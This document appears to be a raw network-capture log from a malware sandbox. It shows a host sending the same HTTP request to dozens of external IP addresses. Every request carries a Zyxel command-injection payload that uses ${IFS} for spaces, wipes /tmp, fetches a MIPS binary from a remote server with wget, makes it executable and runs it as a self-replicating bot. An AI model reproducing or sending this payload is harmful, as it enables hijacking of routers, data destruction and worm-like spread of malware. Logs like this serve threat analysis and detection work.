                                        Mar 31, 2024 09:22:02.413546085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6683192.168.2.2348706164.249.225.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413598061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6684192.168.2.2334110139.129.44.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413871050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6685192.168.2.234145012.226.201.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413950920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6686192.168.2.235331050.40.97.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.419877052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6687192.168.2.2336840189.115.99.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.419917107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6688192.168.2.233889850.4.236.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.419961929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6689192.168.2.2348458189.0.133.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.420043945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6690192.168.2.2354818113.104.200.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.420098066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6691192.168.2.2347906119.131.108.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.420171022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6692192.168.2.233482469.236.128.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.420481920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6693192.168.2.235266494.40.40.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:03.420540094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6694192.168.2.2343430131.224.95.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.433653116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6695192.168.2.233711847.197.33.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.433685064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6696192.168.2.23435261.89.94.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.433728933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6697192.168.2.235518817.63.116.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.433782101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6698192.168.2.2356780197.91.229.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434161901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6699192.168.2.2335730169.119.233.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434164047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6700192.168.2.2344312169.189.122.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434165001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6701192.168.2.235425231.176.223.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434168100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6702192.168.2.235782283.146.166.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434170008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6703192.168.2.2343582183.165.231.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434170008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6704192.168.2.2337626202.231.242.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434168100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6705192.168.2.235275618.110.243.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434168100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6706192.168.2.233456037.188.249.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434168100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6707192.168.2.2337980142.179.154.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434179068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6708192.168.2.2345052209.200.43.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434179068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6709192.168.2.2353240166.9.126.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434182882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6710192.168.2.235339457.218.97.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434205055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6711192.168.2.235459650.134.99.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434209108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6712192.168.2.23578681.217.217.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434216976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6713192.168.2.2341110123.104.127.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434243917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6714192.168.2.233937873.126.6.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434735060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6715192.168.2.2336934162.164.254.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434740067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6716192.168.2.2339968138.119.174.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434739113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6717192.168.2.233534280.238.18.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434739113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6718192.168.2.235650869.254.120.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434741974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6719192.168.2.235918060.178.7.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434740067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6720192.168.2.2351362144.133.21.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434756041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6721192.168.2.235430836.134.18.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434770107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6722192.168.2.2334444186.48.171.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434781075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6723192.168.2.234222051.163.207.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434781075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6724192.168.2.2358356147.209.179.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434786081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6725192.168.2.234480058.234.131.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434787035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6726192.168.2.233657213.69.127.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434787035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6727192.168.2.234615225.72.176.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434808969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6728192.168.2.2334010122.247.95.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434808969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6729192.168.2.235692897.197.123.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434808969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6730192.168.2.23495389.228.128.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434946060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6731192.168.2.234135824.255.12.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.434974909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6732192.168.2.2359940134.23.216.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435038090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6733192.168.2.2347374144.61.114.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435086966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6734192.168.2.2359358136.182.10.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435131073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6735192.168.2.2347236150.143.40.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435162067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6736192.168.2.2346662103.94.75.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435218096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6737192.168.2.235840268.25.61.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435251951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6738192.168.2.235420466.42.101.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435297012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6739192.168.2.2349830194.86.100.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435345888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6740192.168.2.234036219.18.72.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435398102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6741192.168.2.2348134115.47.86.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435434103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6742192.168.2.2355130138.22.200.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435482025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6743192.168.2.2350924107.185.22.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435534000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6744192.168.2.2350284150.83.134.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435591936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6745192.168.2.233517819.179.183.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435616970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6746192.168.2.2342956160.40.167.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435663939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6747192.168.2.2341194158.3.23.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435722113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6748192.168.2.233679453.37.149.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435774088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6749192.168.2.234265495.200.41.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435801983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6750192.168.2.235323237.36.96.79443
                                        TimestampBytes transferredDirectionData
